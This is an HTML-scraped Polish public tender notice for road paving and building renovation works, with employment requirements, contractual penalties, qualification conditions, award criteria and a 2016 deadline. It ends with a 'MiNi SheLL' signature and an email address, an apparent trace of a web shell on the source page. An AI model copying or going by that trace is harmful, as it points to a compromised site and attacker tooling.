a)	Roboty budowlane będą świadczone przez osoby wymienione w wykazie pracowników wykonujących czynności w trakcie realizacji zamówienia.
b)	Wykonawca w terminie do 10 dni licząc od dnia podpisania umowy będzie zobowiązany do przedstawienia zamawiającemu dokumentów potwierdzających sposób zatrudnienie ww. osób (kopię umów o pracę), a także oświadczenie ww. osób, że są zatrudnione na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy z uwzględnieniem minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę przez cały okres realizacji przedmiotu zamówienia,
c)	Wykonawca na każde pisemne żądanie zamawiającego w terminie do 5 dni roboczych przedkładał będzie zamawiającemu raport stanu i sposobu zatrudnienia ww. osób, oświadczenia zatrudnionych osób o otrzymaniu pensji, przedkładał dowody odprowadzenia składek ZUS, przez cały okres realizacji zamówienia.
3.2.	Sankcje z tytułu niespełnienia wymagań w zakresie zatrudnienia.
a)	W przypadku nie przedstawienia w terminie informacji, o której mowa w pkt. 3.1 b) i c) SIWZ wykonawca będzie każdorazowo płacił zamawiającemu karę w wysokości 500 PLN za każdy dzień opóźnienia.
b)	W przypadku dwukrotnego nie wywiązania się z obowiązku wskazanego w pkt. 3.1 b) i c) SIWZ lub zmiany sposobu zatrudnienia osób wskazanych w ofercie (umowa inna niż umowa o pracę), zamawiający ma prawo od umowy odstąpić i naliczy dodatkowo kary umowne wskazane we wzorze umowy jak za nienależyte wykonanie zamówienia.
c)	W przypadku niezatrudnienia przy realizacji zamówienia liczby osób wymaganej przez zamawiającego, wykonawca będzie zobowiązany do zapłacenia kary umownej zamawiającemu, w wysokości 5% całkowitego wynagrodzenia, za każdą niezatrudnioną osobą poniżej liczby wymaganej przez zamawiającego.
d)	W uzasadnionych przypadkach, nie wynikających z działania lub zaniechania wykonawcy, możliwe jest zastąpienie ww. osoby lub osób innymi osobą pod warunkiem, że spełnione zostaną wszystkie powyższe wymagania co do sposobu zatrudnienia na okres realizacji zamówienia określone przez wykonawcę w ofercie.

Wymagane jest wykonanie dokumentacji geodezyjnej powykonawczej.
<br /><br /><b>II.5) Główny kod CPV: </b>45262690-4<br /><b> Dodatkowe kody CPV:</b>45233200-1,
                45233161-5,
                45112700-2,
                43328000-8,
                45315100-9,
                34928310-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że: 
5.3.3.1.	Wykonawca wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę polegającą na wykonaniu robót drogowych w technologii kostki brukowej (ścieżki, drogi) o powierzchni minimum 100m2, wykonał remont budynku polegający na dociepleniu ścian zewnętrznych wymianie stolarki otworowej, remontu instalacji elektrycznej i wodno-kanalizacyjnej oraz pokrycia dachu w obiekcie o kubaturze nie mniejszej niż 300m3 
Uwaga: 
- W przypadku, gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić te roboty rodzajowo i powierzchniowo. 
- W przypadku gdy ww. zakres robót budowlanych został zrealizowany w ramach kilku zadań budowlanych Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje każdy z wymienionych w pkt. 5.3.3.1 typów robót.
5.3.3.2.	Wykonawca dysponuje, co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności: konstrukcyjno-budowlanej. 
Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 
7 lipca 1994 r. Prawo budowlane (Dz. U. 2016r., poz. 290 ze zm.) oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r., poz. 1278). 
Dopuszcza się ważne, odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów. W przypadku wykonawców zagranicznych dopuszcza się równoważne kwalifikacje zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień z ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br /></div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi</td><td>20</td></tr><tr><td>Termin relizacji zamówienia</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiany zostały określone w paragrafie <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 31/10/2016, godzina: 09:55,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com